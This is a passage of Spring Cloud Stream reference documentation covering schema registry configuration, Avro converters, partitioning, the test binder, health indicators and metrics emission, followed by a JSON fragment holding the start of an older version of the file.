the Spring Cloud Stream schema registry can be configured by using the `@EnableSchemaRegistryClient` annotation, as follows:\n\n[source,java]\n----\n @EnableBinding(Sink.class)\n @SpringBootApplication\n @EnableSchemaRegistryClient\n public static class AvroSinkApplication {\n ...\n }\n----\n\nNOTE: The default converter is optimized to cache not only the schemas from the remote server but also the results of the `parse()` and `toString()` methods, which are quite expensive.\nBecause of this, it uses a `DefaultSchemaRegistryClient` that does not cache responses.\nIf you intend to change the default behavior, you can use the client directly in your code and override it to the desired outcome.\nTo do so, you have to add the property `spring.cloud.stream.schemaRegistryClient.cached=true` to your application properties.\n\n==== Schema Registry Client Properties\n\nThe Schema Registry Client supports the following properties:\n\n`spring.cloud.stream.schemaRegistryClient.endpoint`:: The location of the schema server.\nWhen setting this, use a full URL, including protocol (`http` or `https`), port, and context path.\n+\nDefault:: `http:\/\/localhost:8990\/`\n`spring.cloud.stream.schemaRegistryClient.cached`:: Whether the client should cache schema server responses.\nNormally set to `false`, as the caching happens in the message converter.\nClients using the schema registry client should set this to `true`.\n+\nDefault:: 
`false`\n\n=== Avro Schema Registry Client Message Converters\n\nFor applications that have a `SchemaRegistryClient` bean registered with the application context, Spring Cloud Stream auto-configures an Apache Avro message converter for schema management.\nThis eases schema evolution, as applications that receive messages can get easy access to a writer schema that can be reconciled with their own reader schema.\n\nFor outbound messages, if the content type of the channel is set to `application\/*+avro`, the `MessageConverter` is activated, as shown in the following example:\n\n[source,properties]\n----\nspring.cloud.stream.bindings.output.contentType=application\/*+avro\n----\n\nDuring the outbound conversion, the message converter tries to infer the schema of each outbound message (based on its type) and registers it to a subject (based on the payload type) by using the `SchemaRegistryClient`.\nIf an identical schema is already found, then a reference to it is retrieved.\nIf not, the schema is registered, and a new version number is provided.\nThe message is sent with a `contentType` header by using the following scheme: `application\/[prefix].[subject].v[version]+avro`, where `prefix` is configurable and `subject` is deduced from the payload type.\n\nFor example, a message of the type `User` might be sent as a binary payload with a content type of `application\/vnd.user.v2+avro`, where `user` is the subject and `2` is the version number.\n\nWhen receiving messages, the converter infers the schema reference from the header of the incoming message and tries to retrieve it. The schema is used as the writer schema in the deserialization process.\n\n==== Avro Schema Registry Message Converter Properties\n\nIf you have enabled the Avro-based schema registry client by setting `spring.cloud.stream.bindings.output.contentType=application\/*+avro`, you can customize the behavior of the registration by setting the following properties.\n\nspring.cloud.stream.schema.avro.dynamicSchemaGenerationEnabled:: Enable if you want the converter to use reflection to infer a Schema from a POJO.\n+\nDefault: `false`\n+\nspring.cloud.stream.schema.avro.readerSchema:: Avro compares schema versions by looking at a writer schema (origin payload) and a reader schema (your application payload). See the https:\/\/avro.apache.org\/docs\/1.7.6\/spec.html[Avro documentation] for more information. If set, this overrides any lookups at the schema server and uses the local schema as the reader schema.\n+\nDefault: `null`\n+\nspring.cloud.stream.schema.avro.schemaLocations:: Registers any `.avsc` files listed in this property with the Schema Server.\n+\nDefault: `empty`\n+\nspring.cloud.stream.schema.avro.prefix:: The prefix to be used on the Content-Type header.\n+\nDefault: `vnd`\n\n=== Apache Avro Message Converters\n\nSpring Cloud Stream provides support for schema-based message converters through its `spring-cloud-stream-schema` module.\nCurrently, the only serialization format supported out of the box for schema-based message converters is Apache Avro, with more formats to be added in future versions.\n\nThe `spring-cloud-stream-schema` module contains two types of message converters that can be used for Apache Avro serialization:\n\n* Converters that use the class information of the serialized or deserialized objects or a schema with a location known at startup.\n* Converters that use a schema registry. 
They locate the schemas at runtime and dynamically register new schemas as domain objects evolve.\n\n=== Converters with Schema Support\n\nThe `AvroSchemaMessageConverter` supports serializing and deserializing messages either by using a predefined schema or by using the schema information available in the class (either reflectively or contained in the `SpecificRecord`).\nIf you provide a custom converter, the default `AvroSchemaMessageConverter` bean is not created.\n\nTo use a custom converter, you can simply add it to the application context, optionally specifying one or more `MimeType` instances with which to associate it.\nThe default `MimeType` is `application\/avro`.\n\nIf the target type of the conversion is a `GenericRecord`, a schema must be set.\n\nThe following example shows how to configure a converter in a sink application by registering the Apache Avro `MessageConverter` without a predefined schema.\nIn this example, note that the mime type value is `avro\/bytes`, not the default `application\/avro`.\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@SpringBootApplication\npublic static class SinkApplication {\n\n ...\n\n @Bean\n public MessageConverter userMessageConverter() {\n return new AvroSchemaMessageConverter(MimeType.valueOf(\"avro\/bytes\"));\n }\n}\n----\n\nConversely, the following application registers a converter with a predefined schema (found on the classpath):\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@SpringBootApplication\npublic static class SinkApplication {\n\n ...\n\n @Bean\n public MessageConverter userMessageConverter() {\n AvroSchemaMessageConverter converter = new AvroSchemaMessageConverter(MimeType.valueOf(\"avro\/bytes\"));\n converter.setSchemaLocation(new ClassPathResource(\"schemas\/User.avro\"));\n return converter;\n }\n}\n----\n\n=== Schema Registry Server\n\nSpring Cloud Stream provides a schema registry server implementation.\nTo use it, you can add the `spring-cloud-stream-schema-server` artifact to your project and use the `@EnableSchemaRegistryServer` annotation, which adds the schema registry server REST controller to your application.\nThis annotation is intended to be used with Spring Boot web applications, and the listening port of the server is controlled by the `server.port` property.\nThe `spring.cloud.stream.schema.server.path` property can be used to control the root path of the schema server (especially when it is embedded in other applications).\nThe `spring.cloud.stream.schema.server.allowSchemaDeletion` boolean property enables the deletion of a schema. 
By default, this is disabled.\n\nThe schema registry server uses a relational database to store the schemas.\nBy default, it uses an embedded database.\nYou can customize the schema storage by using the http:\/\/docs.spring.io\/spring-boot\/docs\/current-SNAPSHOT\/reference\/htmlsingle\/#boot-features-sql[Spring Boot SQL database and JDBC configuration options].\n\nThe following example shows a Spring Boot application that enables the schema registry:\n\n[source,java]\n----\n@SpringBootApplication\n@EnableSchemaRegistryServer\npublic class SchemaRegistryServerApplication {\n public static void main(String[] args) {\n SpringApplication.run(SchemaRegistryServerApplication.class, args);\n }\n}\n----\n\n==== Schema Registry Server API\n\nThe Schema Registry Server API consists of the following operations:\n\n* `POST \/` -- see \"`<<spring-cloud-stream-overview-registering-new-schema>>`\"\n* `GET \/{subject}\/{format}\/{version}` -- see \"`<<spring-cloud-stream-overview-retrieve-schema-subject-format-version>>`\"\n* `GET \/{subject}\/{format}` -- see \"`<<spring-cloud-stream-overview-retrieve-schema-subject-format>>`\"\n* `GET \/schemas\/{id}` -- see \"`<<spring-cloud-stream-overview-retrieve-schema-id>>`\"\n* `DELETE \/{subject}\/{format}\/{version}` -- see \"`<<spring-cloud-stream-overview-deleting-schema-subject-format-version>>`\"\n* `DELETE \/schemas\/{id}` -- see \"`<<spring-cloud-stream-overview-deleting-schema-id>>`\"\n* `DELETE \/{subject}` -- see \"`<<spring-cloud-stream-overview-deleting-schema-subject>>`\"\n\n[[spring-cloud-stream-overview-registering-new-schema]]\n===== Registering a New Schema\n\nTo register a new schema, send a `POST` request to the `\/` endpoint.\n\nThe `\/` endpoint accepts a JSON payload with the following fields:\n\n* `subject`: The schema subject\n* `format`: The schema format\n* `definition`: The schema definition\n\nIts response is a schema object in JSON, with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema definition\n\n[[spring-cloud-stream-overview-retrieve-schema-subject-format-version]]\n===== Retrieving an Existing Schema by Subject, Format, and Version\n\nTo retrieve an existing schema by subject, format, and version, send a `GET` request to the `\/{subject}\/{format}\/{version}` endpoint.\n\nIts response is a schema object in JSON, with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema definition\n\n[[spring-cloud-stream-overview-retrieve-schema-subject-format]]\n===== Retrieving an Existing Schema by Subject and Format\n\nTo retrieve an existing schema by subject and format, send a `GET` request to the `\/{subject}\/{format}` endpoint.\n\nIts response is a list of schemas, each represented as a JSON object with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema definition\n\n[[spring-cloud-stream-overview-retrieve-schema-id]]\n===== Retrieving an Existing Schema by ID\n\nTo retrieve a schema by its ID, send a `GET` request to the `\/schemas\/{id}` endpoint.\n\nIts response is a schema object in JSON, with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema 
definition\n\n[[spring-cloud-stream-overview-deleting-schema-subject-format-version]]\n===== Deleting a Schema by Subject, Format, and Version\n\nTo delete a schema identified by its subject, format, and version, send a `DELETE` request to the `\/{subject}\/{format}\/{version}` endpoint.\n\n[[spring-cloud-stream-overview-deleting-schema-id]]\n===== Deleting a Schema by ID\n\nTo delete a schema by its ID, send a `DELETE` request to the `\/schemas\/{id}` endpoint.\n\n[[spring-cloud-stream-overview-deleting-schema-subject]]\n===== Deleting a Schema by Subject\n\nTo delete existing schemas by their subject, send a `DELETE` request to the `\/{subject}` endpoint.\n\nNOTE: This note applies to users of Spring Cloud Stream 1.1.0.RELEASE only.\nSpring Cloud Stream 1.1.0.RELEASE used the table name, `schema`, for storing `Schema` objects. `Schema` is a keyword in a number of database implementations.\nTo avoid any conflicts in the future, starting with 1.1.1.RELEASE, we have opted for the name `SCHEMA_REPOSITORY` for the storage table.\nAny Spring Cloud Stream 1.1.0.RELEASE users who upgrade should migrate their existing schemas to the new table before upgrading.\n\n==== Using Confluent's Schema Registry\n\nThe default configuration creates a `DefaultSchemaRegistryClient` bean.\nIf you want to use the Confluent schema registry, you need to create a bean of type `ConfluentSchemaRegistryClient`, which supersedes the one configured by default by the framework. The following example shows how to create such a bean:\n\n[source,java]\n----\n@Bean\npublic SchemaRegistryClient schemaRegistryClient(@Value(\"${spring.cloud.stream.schemaRegistryClient.endpoint}\") String endpoint) {\n ConfluentSchemaRegistryClient client = new ConfluentSchemaRegistryClient();\n client.setEndpoint(endpoint);\n return client;\n}\n----\n\nNOTE: The `ConfluentSchemaRegistryClient` is tested against Confluent platform version 4.0.0.\n\n=== Schema Registration and Resolution\n\nTo better understand how Spring Cloud Stream registers and resolves new schemas and its use of Avro schema comparison features, we provide two separate subsections:\n\n* \"`<<spring-cloud-stream-overview-schema-registration-process>>`\"\n* \"`<<spring-cloud-stream-overview-schema-resolution-process>>`\"\n\n[[spring-cloud-stream-overview-schema-registration-process]]\n==== Schema Registration Process (Serialization)\n\nThe first part of the registration process is extracting a schema from the payload that is being sent over a channel.\nAvro types such as `SpecificRecord` or `GenericRecord` already contain a schema, which can be retrieved immediately from the instance.\nIn the case of POJOs, a schema is inferred if the `spring.cloud.stream.schema.avro.dynamicSchemaGenerationEnabled` property is set to `true`.\n\n.Schema Writer Resolution Process\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/schema_resolution.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nOnce a schema is obtained, the converter loads its metadata (version) from the remote server.\nFirst, it queries a local cache. 
If no result is found, it submits the data to the server, which replies with versioning information.\nThe converter always caches the results to avoid the overhead of querying the Schema Server for every new message that needs to be serialized.\n\n.Schema Registration Process\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/registration.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nWith the schema version information, the converter sets the `contentType` header of the message to carry the version information -- for example: `application\/vnd.user.v1+avro`.\n\n[[spring-cloud-stream-overview-schema-resolution-process]]\n==== Schema Resolution Process (Deserialization)\n\nWhen reading messages that contain version information (that is, a `contentType` header with a scheme like the one described under \"`<<spring-cloud-stream-overview-schema-registration-process>>`\"), the converter queries the Schema Server to fetch the writer schema of the message.\nOnce it has found the correct schema of the incoming message, it retrieves the reader schema and, by using Avro's schema resolution support, reads it into the reader definition (setting defaults and any missing properties).\n\n.Schema Reading Resolution Process\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/schema_reading.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nNOTE: You should understand the difference between a writer schema (used by the application that wrote the message) and a reader schema (used by the receiving application).\nWe suggest taking a moment to read https:\/\/avro.apache.org\/docs\/1.7.6\/spec.html[the Avro terminology] and understand the process.\nSpring Cloud Stream always fetches the writer schema to determine how to read a message.\nIf you want to get Avro's schema evolution support working, you need to make sure that a `readerSchema` was properly set for your application.\n\n== Inter-Application Communication\n\nSpring Cloud Stream enables communication between applications. Inter-application communication is a complex issue spanning several concerns, as described in the following topics:\n\n* \"`<<spring-cloud-stream-overview-connecting-multiple-application-instances>>`\"\n* \"`<<spring-cloud-stream-overview-instance-index-instance-count>>`\"\n* \"`<<spring-cloud-stream-overview-partitioning>>`\"\n\n[[spring-cloud-stream-overview-connecting-multiple-application-instances]]\n=== Connecting Multiple Application Instances\n\nWhile Spring Cloud Stream makes it easy for individual Spring Boot applications to connect to messaging systems, the typical scenario for Spring Cloud Stream is the creation of multi-application pipelines, where microservice applications send data to each other.\nYou can achieve this scenario by correlating the input and output destinations of \"`adjacent`\" applications.\n\nSuppose a design calls for the Time Source application to send data to the Log Sink application. 
You could use a common destination named `ticktock` for bindings within both applications.\n\nTime Source (that has the channel name `output`) would set the following property:\n\n----\nspring.cloud.stream.bindings.output.destination=ticktock\n----\n\nLog Sink (that has the channel name `input`) would set the following property:\n\n----\nspring.cloud.stream.bindings.input.destination=ticktock\n----\n\n[[spring-cloud-stream-overview-instance-index-instance-count]]\n=== Instance Index and Instance Count\n\nWhen scaling up Spring Cloud Stream applications, each instance can receive information about how many other instances of the same application exist and what its own instance index is.\nSpring Cloud Stream does this through the `spring.cloud.stream.instanceCount` and `spring.cloud.stream.instanceIndex` properties.\nFor example, if there are three instances of an HDFS sink application, all three instances have `spring.cloud.stream.instanceCount` set to `3`, and the individual applications have `spring.cloud.stream.instanceIndex` set to `0`, `1`, and `2`, respectively.\n\nWhen Spring Cloud Stream applications are deployed through Spring Cloud Data Flow, these properties are configured automatically; when Spring Cloud Stream applications are launched independently, these properties must be set correctly.\nBy default, `spring.cloud.stream.instanceCount` is `1`, and `spring.cloud.stream.instanceIndex` is `0`.\n\nIn a scaled-up scenario, correct configuration of these two properties is important for addressing partitioning behavior in general (see \"`<<spring-cloud-stream-overview-partitioning>>`\"), and the two properties are always required by certain binders (for example, the Kafka binder) in order to ensure that data is split correctly across multiple consumer instances.\n\n[[spring-cloud-stream-overview-partitioning]]\n=== Partitioning\n\nPartitioning in Spring Cloud Stream consists of two tasks:\n\n* \"`<<spring-cloud-stream-overview-configuring-output-bindings-partitioning>>`\"\n* \"`<<spring-cloud-stream-overview-configuring-input-bindings-partitioning>>`\"\n\n[[spring-cloud-stream-overview-configuring-output-bindings-partitioning]]\n==== Configuring Output Bindings for Partitioning\n\nYou can configure an output binding to send partitioned data by setting one and only one of its `partitionKeyExpression` or `partitionKeyExtractorName` properties, as well as its `partitionCount` property.\n\nFor example, the following is a valid and typical configuration:\n\n----\nspring.cloud.stream.bindings.output.producer.partitionKeyExpression=payload.id\nspring.cloud.stream.bindings.output.producer.partitionCount=5\n----\n\nBased on that example configuration, data is sent to the target partition by using the following logic.\n\nA partition key's value is calculated for each message sent to a partitioned output channel based on the `partitionKeyExpression`.\nThe `partitionKeyExpression` is a SpEL expression that is evaluated against the outbound message for extracting the partitioning key.\n\nIf a SpEL expression is not sufficient for your needs, you can instead calculate the partition key value by providing an implementation of `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` and configuring it as a bean (by using the `@Bean` annotation).\nIf you have more than one bean of type `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` available in the Application Context, you can further filter it by specifying its name with the `partitionKeyExtractorName` property, as shown in the following 
example:\n\n[source]\n----\n--spring.cloud.stream.bindings.output.producer.partitionKeyExtractorName=customPartitionKeyExtractor\n--spring.cloud.stream.bindings.output.producer.partitionCount=5\n. . .\n@Bean\npublic CustomPartitionKeyExtractorClass customPartitionKeyExtractor() {\n return new CustomPartitionKeyExtractorClass();\n}\n----\n\nNOTE: In previous versions of Spring Cloud Stream, you could specify the implementation of `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` by setting the `spring.cloud.stream.bindings.output.producer.partitionKeyExtractorClass` property.\nSince version 2.0, this property is deprecated, and support for it will be removed in a future version.\n\nOnce the message key is calculated, the partition selection process determines the target partition as a value between `0` and `partitionCount - 1`.\nThe default calculation, applicable in most scenarios, is based on the following formula: `key.hashCode() % partitionCount`.\nThis can be customized on the binding, either by setting a SpEL expression to be evaluated against the `key` (through the `partitionSelectorExpression` property) or by configuring an implementation of `org.springframework.cloud.stream.binder.PartitionSelectorStrategy` as a bean (by using the `@Bean` annotation).\nSimilar to the `PartitionKeyExtractorStrategy`, you can further filter it by using the `spring.cloud.stream.bindings.output.producer.partitionSelectorName` property when more than one bean of this type is available in the Application Context, as shown in the following example:\n\n[source]\n----\n--spring.cloud.stream.bindings.output.producer.partitionSelectorName=customPartitionSelector\n. . .\n@Bean\npublic CustomPartitionSelectorClass customPartitionSelector() {\n return new CustomPartitionSelectorClass();\n}\n----\n\nNOTE: In previous versions of Spring Cloud Stream, you could specify the implementation of `org.springframework.cloud.stream.binder.PartitionSelectorStrategy` by setting the `spring.cloud.stream.bindings.output.producer.partitionSelectorClass` property.\nSince version 2.0, this property is deprecated, and support for it will be removed in a future version.\n\n[[spring-cloud-stream-overview-configuring-input-bindings-partitioning]]\n==== Configuring Input Bindings for Partitioning\n\nAn input binding (with the channel name `input`) is configured to receive partitioned data by setting its `partitioned` property, as well as the `instanceIndex` and `instanceCount` properties on the application itself, as shown in the following example:\n\n----\nspring.cloud.stream.bindings.input.consumer.partitioned=true\nspring.cloud.stream.instanceIndex=3\nspring.cloud.stream.instanceCount=5\n----\n\nThe `instanceCount` value represents the total number of application instances between which the data should be partitioned.\nThe `instanceIndex` must be a unique value across the multiple instances, with a value between `0` and `instanceCount - 1`.\nThe instance index helps each application instance to identify the unique partition(s) from which it receives data.\nIt is required by binders using technology that does not support partitioning natively.\nFor example, with RabbitMQ, there is a queue for each partition, with the queue name containing the instance index.\nWith Kafka, if `autoRebalanceEnabled` is `true` (the default), Kafka takes care of distributing partitions across instances, and these properties are not required.\nIf `autoRebalanceEnabled` is set to `false`, the `instanceCount` and `instanceIndex` are used by the 
binder to determine which partition(s) the instance subscribes to (you must have at least as many partitions as there are instances).\nThe binder allocates the partitions instead of Kafka.\nThis might be useful if you want messages for a particular partition to always go to the same instance.\nWhen a binder configuration requires them, it is important to set both values correctly in order to ensure that all of the data is consumed and that the application instances receive mutually exclusive datasets.\n\nWhile using multiple instances for partitioned data processing may be complex to set up in the standalone case, Spring Cloud Data Flow can simplify the process significantly by populating both the input and output values correctly and by letting you rely on the runtime infrastructure to provide information about the instance index and instance count.\n\n== Testing\n\nSpring Cloud Stream provides support for testing your microservice applications without connecting to a messaging system.\nYou can do that by using the `TestSupportBinder` provided by the `spring-cloud-stream-test-support` library, which can be added as a test dependency to the application, as shown in the following example:\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-stream-test-support<\/artifactId>\n <scope>test<\/scope>\n <\/dependency>\n----\n\nNOTE: The `TestSupportBinder` uses the Spring Boot autoconfiguration mechanism to supersede the other binders found on the classpath.\nTherefore, when adding a binder as a dependency, you must make sure that the `test` scope is being used.\n\nThe `TestSupportBinder` lets you interact with the bound channels and inspect any messages sent and received by the application.\n\nFor outbound message channels, the `TestSupportBinder` registers a single subscriber and retains the messages emitted by the application in a `MessageCollector`.\nThey can be retrieved during tests and have assertions made against them.\n\nYou can also send messages to inbound message channels so that the consumer application can consume the messages.\nThe following example shows how to test both input and output channels on a processor:\n\n[source,java]\n----\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment= SpringBootTest.WebEnvironment.RANDOM_PORT)\npublic class ExampleTest {\n\n @Autowired\n private Processor processor;\n\n @Autowired\n private MessageCollector messageCollector;\n\n @Test\n @SuppressWarnings(\"unchecked\")\n public void testWiring() {\n Message<String> message = new GenericMessage<>(\"hello\");\n processor.input().send(message);\n Message<String> received = (Message<String>) messageCollector.forChannel(processor.output()).poll();\n assertThat(received.getPayload(), equalTo(\"hello world\"));\n }\n\n\n @SpringBootApplication\n @EnableBinding(Processor.class)\n public static class MyProcessor {\n\n @Autowired\n private Processor channels;\n\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public String transform(String in) {\n return in + \" world\";\n }\n }\n}\n----\n\nIn the preceding example, we create an application that has an input channel and an output channel, both bound through the `Processor` interface.\nThe bound interface is injected into the test so that we can have access to both channels.\nWe send a message on the input channel, and we use the `MessageCollector` provided by Spring Cloud Stream's test support to capture that the message has been sent 
to the output channel as a result.\nOnce we have received the message, we can validate that the component functions correctly.\n\n=== Disabling the Test Binder Autoconfiguration\n\nThe intent behind the test binder superseding all the other binders on the classpath is to make it easy to test your applications without making changes to your production dependencies.\nIn some cases (for example, integration tests), it is useful to use the actual production binders instead, and that requires disabling the test binder autoconfiguration.\nTo do so, you can exclude the `org.springframework.cloud.stream.test.binder.TestSupportBinderAutoConfiguration` class by using one of the Spring Boot autoconfiguration exclusion mechanisms, as shown in the following example:\n\n[source,java]\n----\n @SpringBootApplication(exclude = TestSupportBinderAutoConfiguration.class)\n @EnableBinding(Processor.class)\n public static class MyProcessor {\n\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public String transform(String in) {\n return in + \" world\";\n }\n }\n----\n\nWhen autoconfiguration is disabled, the test binder is available on the classpath, and its `defaultCandidate` property is set to `false` so that it does not interfere with the regular user configuration. It can be referenced under the name `test`, as shown in the following example:\n\n`spring.cloud.stream.defaultBinder=test`\n\n== Health Indicator\n\nSpring Cloud Stream provides a health indicator for binders.\nIt is registered under the name `binders` and can be enabled or disabled by setting the `management.health.binders.enabled` property.\n\nTo enable health checks, you first need to enable both \"web\" and \"actuator\" by including their dependencies (see <<spring-cloud-stream-preface-actuator-web-dependencies>>).\n\nIf `management.health.binders.enabled` is not set explicitly by the application, then `management.health.defaults.enabled` is matched as `true` and the binder health indicators are enabled.\nIf you want to disable the health indicator completely, you have to set `management.health.binders.enabled` to `false`.\n\nYou can use the Spring Boot Actuator health endpoint (`\/actuator\/health`) to access the health indicator.\nBy default, you only receive the top-level application status when you hit that endpoint.\nIn order to receive the full details from the binder-specific health indicators, you need to include the property `management.endpoint.health.show-details` with the value `ALWAYS` in your application.\n\nHealth indicators are binder-specific, and certain binder implementations may not necessarily provide a health indicator.\n\nIf you want to completely disable all health indicators available out of the box and instead provide your own health indicators,\nyou can do so by setting the property `management.health.binders.enabled` to `false` and then providing your own `HealthIndicator` beans in your application.\nIn this case, the health indicator infrastructure from Spring Boot still picks up these custom beans.\nEven if you are not disabling the binder health indicators, you can still enhance the health checks by providing your own `HealthIndicator` beans in addition to the out-of-the-box health checks.\n\nWhen you have multiple binders in the same application, health indicators are enabled by default unless the application turns them off by setting `management.health.binders.enabled` to `false`.\nIn this case, if you want to disable the health check for a subset of the binders, 
you can do so by setting `management.health.binders.enabled` to `false` in the multi-binder configuration's environment.\nSee <<multiple-systems,Connecting to Multiple Systems>> for details on how environment-specific properties can be provided.\n\n\n[[spring-cloud-stream-overview-metrics-emitter]]\n== Metrics Emitter\n\nSpring Boot Actuator provides dependency management and auto-configuration for https:\/\/micrometer.io\/[Micrometer], an application metrics\nfacade that supports numerous https:\/\/docs.spring.io\/spring-boot\/docs\/2.0.0.RELEASE\/reference\/htmlsingle\/#production-ready-metrics[monitoring systems].\n\nSpring Cloud Stream provides support for emitting any available Micrometer-based metrics to a binding destination, allowing for periodic\ncollection of metric data from stream applications without relying on polling individual endpoints.\n\nMetrics Emitter is activated by defining the `spring.cloud.stream.bindings.applicationMetrics.destination` property,\nwhich specifies the name of the binding destination used by the current binder to publish metric messages.\n\nFor example:\n\n[source,properties]\n----\nspring.cloud.stream.bindings.applicationMetrics.destination=myMetricDestination\n----\n\nThe preceding example instructs the binder to bind to `myMetricDestination` (that is, a Rabbit exchange, a Kafka topic, or the equivalent in other middleware).\n\nThe following properties can be used for customizing the emission of metrics:\n\nspring.cloud.stream.metrics.key::\nThe name of the metric being emitted. Should be a unique value per application.\n+\nDefault: `${spring.application.name:${vcap.application.name:${spring.config.name:application}}}`\n+\nspring.cloud.stream.metrics.properties::\nAllows whitelisting application properties that are added to the metrics payload.\n+\nDefault: null.\n+\nspring.cloud.stream.metrics.meter-filter::\nA pattern to control the meters one wants to capture.\nFor example, specifying `spring.integration.*` captures metric information for meters whose name starts with `spring.integration.`\n+\nDefault: all meters are captured.\n+\nspring.cloud.stream.metrics.schedule-interval::\nInterval to control the rate of publishing metric data.\n+\nDefault: 1 minute.\n\nConsider the following:\n\n[source,bash]\n----\njava -jar time-source.jar \\\n --spring.cloud.stream.bindings.applicationMetrics.destination=someMetrics \\\n --spring.cloud.stream.metrics.properties=spring.application** \\\n --spring.cloud.stream.metrics.meter-filter=spring.integration.*\n----\n\nThe following example shows the payload of the data published to the binding destination as a result of the preceding command:\n\n[source,javascript]\n----\n{\n\t\"name\": \"application\",\n\t\"createdTime\": \"2018-03-23T14:48:12.700Z\",\n\t\"properties\": {\n\t},\n\t\"metrics\": [\n\t\t{\n\t\t\t\"id\": {\n\t\t\t\t\"name\": \"spring.integration.send\",\n\t\t\t\t\"tags\": [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"exception\",\n\t\t\t\t\t\t\"value\": \"none\"\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"name\",\n\t\t\t\t\t\t\"value\": \"input\"\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"result\",\n\t\t\t\t\t\t\"value\": \"success\"\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"type\",\n\t\t\t\t\t\t\"value\": \"channel\"\n\t\t\t\t\t}\n\t\t\t\t],\n\t\t\t\t\"type\": \"TIMER\",\n\t\t\t\t\"description\": \"Send processing time\",\n\t\t\t\t\"baseUnit\": \"milliseconds\"\n\t\t\t},\n\t\t\t\"timestamp\": \"2018-03-23T14:48:12.697Z\",\n\t\t\t\"sum\": 130.340546,\n\t\t\t\"count\": 6,\n\t\t\t\"mean\": 
21.72342433333333,\n\t\t\t\"upper\": 116.176299,\n\t\t\t\"total\": 130.340546\n\t\t}\n\t]\n}\n----\n\nNOTE: Given that the format of the Metric message has slightly changed after migrating to Micrometer, the published message will also have\na `STREAM_CLOUD_STREAM_VERSION` header set to `2.x` to help distinguish between Metric messages from the older versions of the Spring Cloud Stream.\n\n== Samples\n\nFor Spring Cloud Stream samples, see the https:\/\/github.com\/spring-cloud\/spring-cloud-stream-samples[spring-cloud-stream-samples] repository on GitHub.\n\n=== Deploying Stream Applications on CloudFoundry\n\nOn CloudFoundry, services are usually exposed through a special environment variable called https:\/\/docs.cloudfoundry.org\/devguide\/deploy-apps\/environment-variable.html#VCAP-SERVICES[VCAP_SERVICES].\n\nWhen configuring your binder connections, you can use the values from an environment variable as explained on the http:\/\/docs.spring.io\/spring-cloud-dataflow-server-cloudfoundry\/docs\/current-SNAPSHOT\/reference\/htmlsingle\/#getting-started-ups[dataflow Cloud Foundry Server] docs.","old_contents":"\/\/ Do not edit this file (e.g. go instead to src\/main\/asciidoc)\n\n:github-tag: master\n:github-repo: spring-cloud\/spring-cloud-stream\n:github-raw: https:\/\/raw.githubusercontent.com\/{github-repo}\/{github-tag}\n:github-code: https:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n:toclevels: 8\n:nofooter:\n:sectlinks: true\n\n[partintro]\n--\nThis section goes into more detail about how you can work with Spring Cloud Stream.\nIt covers topics such as creating and running stream applications.\n--\n\n[[spring-cloud-stream-overview-introducing]]\n== Introducing Spring Cloud Stream\n\nSpring Cloud Stream is a framework for building message-driven microservice applications.\nSpring Cloud Stream builds upon Spring Boot to create standalone, production-grade Spring applications and uses Spring Integration to provide connectivity to message brokers.\nIt provides opinionated configuration of middleware from several vendors, introducing the concepts of persistent publish-subscribe semantics, consumer groups, and partitions.\n\nYou can add the `@EnableBinding` annotation to your application to get immediate connectivity to a message broker, and you can add `@StreamListener` to a method to cause it to receive events for stream processing.\nThe following example shows a sink application that receives external messages:\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Sink.class)\npublic class VoteRecordingSinkApplication {\n\n public static void main(String[] args) {\n SpringApplication.run(VoteRecordingSinkApplication.class, args);\n }\n\n @StreamListener(Sink.INPUT)\n public void processVote(Vote vote) {\n votingService.recordVote(vote);\n }\n}\n----\n\nThe `@EnableBinding` annotation takes one or more interfaces as parameters (in this case, the parameter is a single `Sink` interface).\nAn interface declares input and output channels.\nSpring Cloud Stream provides the `Source`, `Sink`, and `Processor` interfaces. 
You can also define your own interfaces.\n\nThe following listing shows the definition of the `Sink` interface:\n\n[source,java]\n----\npublic interface Sink {\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n}\n----\n\nThe `@Input` annotation identifies an input channel, through which received messages enter the application.\nThe `@Output` annotation identifies an output channel, through which published messages leave the application.\nThe `@Input` and `@Output` annotations can take a channel name as a parameter.\nIf a name is not provided, the name of the annotated method is used.\n\nSpring Cloud Stream creates an implementation of the interface for you.\nYou can use this in the application by autowiring it, as shown in the following example (from a test case):\n\n[source,java]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = VoteRecordingSinkApplication.class)\n@WebAppConfiguration\n@DirtiesContext\npublic class StreamApplicationTests {\n\n @Autowired\n private Sink sink;\n\n @Test\n public void contextLoads() {\n assertNotNull(this.sink.input());\n }\n}\n----\n\n== Main Concepts\n\nSpring Cloud Stream provides a number of abstractions and primitives that simplify the writing of message-driven microservice applications.\nThis section gives an overview of the following:\n\n* 